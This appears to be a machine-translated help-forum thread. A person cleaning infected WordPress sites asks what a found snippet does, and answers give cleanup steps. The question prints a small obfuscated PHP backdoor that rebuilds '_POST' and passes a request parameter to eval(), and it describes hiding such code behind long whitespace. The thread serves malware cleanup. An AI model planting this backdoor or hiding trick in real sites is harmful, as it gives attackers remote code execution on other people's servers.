所以,今天我清理了一些客户的网站,发现很多wordpress插件上都有很多整洁的恶意代码。
有些非常整洁(= D),但最好的一个是在<?php
之后放置大量缩进并将恶意代码放在?>
结尾并打开另一个之前的旧技巧该行末尾为<?php
,因此看起来只有一个<?php
。
现在,我要问的是恶意代码会做什么?这是我找到的示例代码之一:
$qV="stop_";
$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);
if(isset(${$s20}['q571d85'])) {
eval(${$s20}['q571d85']);
}
上面的代码应该产生错误($qv
不是数组),但事实并非如此。任何人都可以解释它是什么?
答案 0 :(得分:0)
1)安装新的wordpress。(新) 2)下载所有插件(新) 3)连接旧数据库 4)添加所有上传媒体 5)检查你的theam&amp;模板和Js文件。
查找和替换
$qV="stop_";
$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);
if(isset(${$s20}['q571d85'])) {
eval(${$s20}['q571d85']);
}
答案 1 :(得分:0)
首先检查Wordpress版本并从wordpress.org下载相同版本。用最新下载的文件替换wp-admin,wp-include和root文件。一旦你将这个恶意软件保留在你的插件和主题中。接下来只需使用最新的插件升级你的插件,它也将从插件中完成。
要检入它们,您可以使用任何防病毒扫描,它将找到恶意软件代码。你可以在所有文件中手动删除它几乎相同的代码。
希望这会有所帮助!